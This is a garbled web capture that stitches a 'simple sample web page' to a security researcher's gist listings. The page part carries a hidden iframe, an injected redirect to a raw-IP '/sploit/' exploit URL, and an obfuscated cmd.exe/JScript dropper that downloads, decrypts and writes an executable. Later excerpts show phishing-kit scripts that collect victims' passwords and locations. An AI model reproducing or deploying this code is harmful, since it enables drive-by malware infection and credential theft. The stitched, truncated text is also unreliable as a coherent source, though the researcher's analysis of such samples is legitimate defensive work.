
<HEAD>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
<iframe width="0" scrolling="no" height="0" frameborder="0" src="" seamless="seamless">
<H1>A Simple Sample Web Page</H1>
If you would like to make a link or bookmark to this page, the URL is:<BR> http://sheldonbrown.com/web_sample1.html
// Injected redirect from the captured page (assumes $ is jQuery; confirm against the full sample).
// It removes <body>, appends the literal string "body" to <html>, then replaces that element's
// contents with a single empty <div>, and finally navigates the browser to the hardcoded URL.
// NOTE(review): the destination is a raw-IP URL with a "/sploit/" path; host and path are
// indicators worth searching for in proxy and web-gateway logs.
$("body").remove();$("html").append("body").html("<div style=\"\"></div>");window.location.href = "http://194.58.38.103/sploit/flow3.php"
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=0x24;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+"."+e+"Request.5.1");y.setProxy(n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,S="etofile",a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinH"+"TTP",j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v["charCo"+"deAt"](027+v[M]("PE\x00\x00"));s.WriteText
brad-anton / WannaCryTest.cpp
Last active May 16, 2017 20:33
A simple test to check the behavior of WannaCry's Kill Switch functionality
/*
A simple test to check the behavior of WannaCry's Kill Switch
functionality. Compile with Visual Studio.
@brad_anton
Example Run:
Set DNS to 208.67.222.222
C:\Users\user\Desktop\WannaCryTest\Debug>WannaCryTest.exe
GOOD: WannaCry would have been aborted!
GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
brad-anton / README.md
Created June 11, 2017 17:55
Building TLSH on Ubuntu 16.04
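# Build prerequisite for TLSH.
sudo apt-get install cmake
# -f makes curl exit non-zero on an HTTP error instead of saving the error page as the archive.
curl -fL -O https://github.com/trendmicro/tlsh/archive/v3.4.5.zip
# Print the archive digest and compare it with a value obtained from a trusted source
# before unpacking: make.sh below executes code that comes from this download.
sha256sum v3.4.5.zip
unzip v3.4.5.zip
cd tlsh-3.4.5/
bash make.sh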

Python module

brad-anton / spamregurg.py
Created September 21, 2017 16:05
Checks your mailbox for lots of 'Confirm' messages and then pulls info from them
import httplib2
import os
import base64
import email
import re
from apiclient import errors
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
brad-anton / post.php
Created November 20, 2017 20:01
Server-side phishing collection form
<?php
// Opening lines of a phishing-kit collector (the listing is a truncated preview).
// The visible part geolocates the requesting client before anything else happens.
// Client address as reported by the web server environment.
$ip = getenv("REMOTE_ADDR");
//Get IP Country City
// NOTE(review): this ip-country URL is overwritten by the next assignment before it is used,
// so only the ip-city lookup is actually requested.
$url = "http://api.ipinfodb.com/v3/ip-country/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip";
// The ipinfodb API key is hardcoded and the request uses plain HTTP; the key string is a
// stable artifact for correlating other copies of this kit.
$url = "http://api.ipinfodb.com/v3/ip-city/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip";
// Fetches the geolocation response for the client address; how it is parsed is not visible here.
$ipCountryCityInfo = file_get_contents($url);
//
brad-anton / README.md
Last active March 30, 2018 12:16
Using the Exploit Kit Tracker

Client Library

An example client library can be found in client.py. To use:

>>> from client import ektracker_client
>>> e = ektracker_client('your_api_key') 

>>> e.add_tag('rig', 'rig exploit kit', [ 'http://www.google.com/', 'http://www.test.com' ], ['.*', '[a-f]{1,}'])
Uploading Tag: {'signatures': ['.*', '[a-f]{1,}'], 'references': ['http://www.google.com/', 'http://www.test.com'], 'name': 'rig', 'description': 'rig exploit kit'}
brad-anton / 3d.php
Created November 20, 2017 21:39
A more capable form collector found in use in phishing campaigns
<?php
// Opening lines of a credential-collection script from a phishing kit (truncated preview;
// visitor_country() is defined outside the visible lines).
session_start();
$country = visitor_country();
// Client address as seen by the web server.
$ip = $_SERVER['REMOTE_ADDR'];
// The e-mail address is read from session state, presumably stored by an earlier page of
// the kit; confirm against the full sample.
$login = $_SESSION['clientemail'];
// Password taken directly from the submitted form field 'passwd'.
$passwd = $_POST['passwd'];
// NOTE(review): the sender address and the legitimate Outlook URL are hardcoded; their use is
// not visible here (the URL is presumably where the victim is sent after submitting).
// Both strings are useful for matching other copies of the kit.
$sender = 'Hotmail-3D@serverX.com';
$over = 'https://outlook.live.com/owa/?path=/mail/inbox';